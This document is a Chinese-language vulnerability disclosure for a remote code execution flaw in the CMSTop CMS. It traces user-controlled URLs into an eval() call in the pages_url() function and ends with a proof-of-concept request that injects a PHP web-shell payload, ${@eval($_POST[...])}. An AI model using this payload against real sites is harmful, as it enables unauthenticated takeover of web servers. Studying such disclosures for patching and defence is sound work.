cmstop 远程代码执行漏洞（大众版）

### 简要描述： ### 详细说明： 具体代码分析 在search\controller\index.php中 search方法如下 public function search( ) { session_start( ); $limit = setting( "search", "limit" ); if ( $limit ) { if ( $_SESSION['last_search'] && TIME - $_SESSION['last_search'] < $limit ) { $this->showmessage( "搜索太频繁，请稍候再搜索" ); } $_SESSION['last_search'] = TIME; } $GLOBALS['_GET']['wd'] = preg_replace( "/\\s+/", " ", trim( $_GET['wd'] ) ); if ( empty( $_GET['wd'] ) ) { $this->showmessage( "请输入搜索关键词" ); } $data = $this->search->search( $_GET ); $multipage = $this->search->getPagin( ); //漏洞点，跟踪该对象 $this->template->assign( "wd", $_GET['wd'] ); $this->template->assign( "data", $data ); $this->template->assign( "multipage", $multipage ); $this->template->display( "search/list.html" ); } 在\search\model\search.php中找到 public function getPagin( ) { $requestUrl = request::get_url( ); $page = $_GET['page'] ? $_GET['page'] : 1; $multipage = pages( $this->total, $page, $this->pagesize, 3, $requestUrl ); //跟踪pages方法 return $multipage; } 在framework\core\function.php中找到pages函数，跟踪pages_url（）函数 function pages($total, $page = 1, $pagesize = 20, $offset = 2, $url = null, $mode = false) { if($total <= $pagesize) return ''; $page = max(intval($page), 1); $pages = ceil($total/$pagesize); $page = min($pages, $page); $prepage = max($page-1, 1); $nextpage = min($page+1, $pages); $from = max($page - $offset, 2); if ($pages - $page - $offset < 1) $from = max($pages - $offset*2 - 1, 2); $to = min($page + $offset, $pages-1); if ($page - $offset < 2) $to = min($offset*2+2, $pages-1); $more = 1; if ($pages <= ($offset*2+5)) { $from = 2; $to = $pages - 1; $more = 0; } $str = ''; $str .= '<li><a href="'.pages_url($url, $prepage, $mode).'">上一页</a></li>'; $str .= $page == 1 ? '<li><a href="'.pages_url($url, 1, $mode).'" class="now">1</a></li>' : '<li><a href="'.pages_url($url, 1, $mode).'">1'.($from > 2 && $more ? '...' : '').'</a></li>'; if ($to >= $from) { for($i = $from; $i <= $to; $i++) { $str .= $i == $page ? '<li><a href="'.pages_url($url, $i, $mode).'" class="now">'.$i.'</a></li>' : '<li><a href="'.pages_url($url, $i, $mode).'">'.$i.'</a></li>'; } } $str .= $page == $pages ? '<li><a href="'.pages_url($url, $pages, $mode).'" class="now">'.$pages.'</a></li>' : '<li><a href="'.pages_url($url, $pages, $mode).'">'.($to < $pages-1 && $more ? '...' : '').$pages.'</a></li>'; $str .= '<li><a href="'.pages_url($url, $nextpage, $mode).'">下一页</a></li>'; return $str; } 无需登录 一键取shell 危害大至站长网 下至人人 以及一些大型新闻站点 在function.php中找到pages_url 函数 function pages_url($url, $page, $mode = false) { if (!$url) $url = URL; if (strpos($url, '$page') === false) { $url = url_query($url, array('page'=>$page), $mode); } else { eval("\$url = \"$url\";"); //最终产生远程任意代码执行 } return $url; } 当url存在$page的时候就执行 eval("\$url = \"$url\";") ,这样当我们构造恶意url即可执行我们的任意代码 如当我们访问如下链接 http://app.xxx.com/?app=search&controller=index&id=$page&action=search&wd=a&test=${@eval($_POST[xxxx])} 即可远程直接控制web服务器 ### 漏洞证明： http://app.xxx.com/?app=search&controller=index&id=$page&action=search&wd=a&test=${@eval($_POST[xxxx])}